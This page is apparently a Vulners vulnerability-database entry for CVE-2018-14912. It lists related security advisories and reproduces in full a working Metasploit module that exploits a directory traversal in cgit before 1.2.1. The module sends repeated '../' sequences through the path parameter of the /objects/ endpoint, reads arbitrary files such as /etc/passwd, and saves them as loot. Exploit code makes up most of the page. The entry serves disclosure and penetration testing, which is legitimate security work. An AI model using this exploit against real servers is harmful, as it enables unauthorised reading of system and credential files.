Vulners
Lucene search
cgit 1.2.1 - Directory Traversal (Metasploit)
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
 | cgit -- directory traversal vulnerability | 3 Aug 201800:00 | – | freebsd |
 | cgit 1.2.1 - Directory Traversal Exploit | 14 Aug 201800:00 | – | zdt |
 | CVE-2018-14912 | 3 Aug 201819:00 | – | alpinelinux |
 | [ASA-201808-2] cgit: directory traversal | 3 Aug 201800:00 | – | archlinux |
 | CVE-2018-14912 | 13 Aug 201821:33 | – | circl |
 | CVE-2018-14912 | 3 Aug 201819:00 | – | cve |
 | CVE-2018-14912 | 3 Aug 201819:00 | – | cvelist |
 | [SECURITY] [DLA-1459-1] cgit security update | 6 Aug 201807:07 | – | debian |
| [SECURITY] [DSA 4263-1] cgit security update | 4 Aug 201812:05 | – | debian |
| [SECURITY] [DSA 4263-1] cgit security update | 4 Aug 201812:05 | – | debian |
10
# Title: cgit 1.2.1 - Directory Traversal (Metasploit)
# Author: Dhiraj Mishra
# Software: cgit
# Link: https://git.zx2c4.com/cgit/
# Date: 2018-08-14
# CVE: CVE-2018-14912
# This module exploits a directory traversal vulnerability which exists
# in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration
# flag enable-http-clone is set to 1 (default).
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'cgit Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability which
exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the
configuration flag enable-http-clone is set to 1 (default).
},
'References' =>
[
['CVE', '2018-14912'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],
['EDB', '45148']
],
'Author' =>
[
'Google Project Zero', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => 'Aug 03 2018',
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']),
OptString.new('REPO', [true, "Git repository on the remote server", '']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "../" * datastore['DEPTH'] << filename
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),
'vars_get' => {'path' => traversal}
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - \n#{res.body}")
path = store_loot(
'cgit.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Aug 2018 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25
CVSS 37.5
EPSS0.91474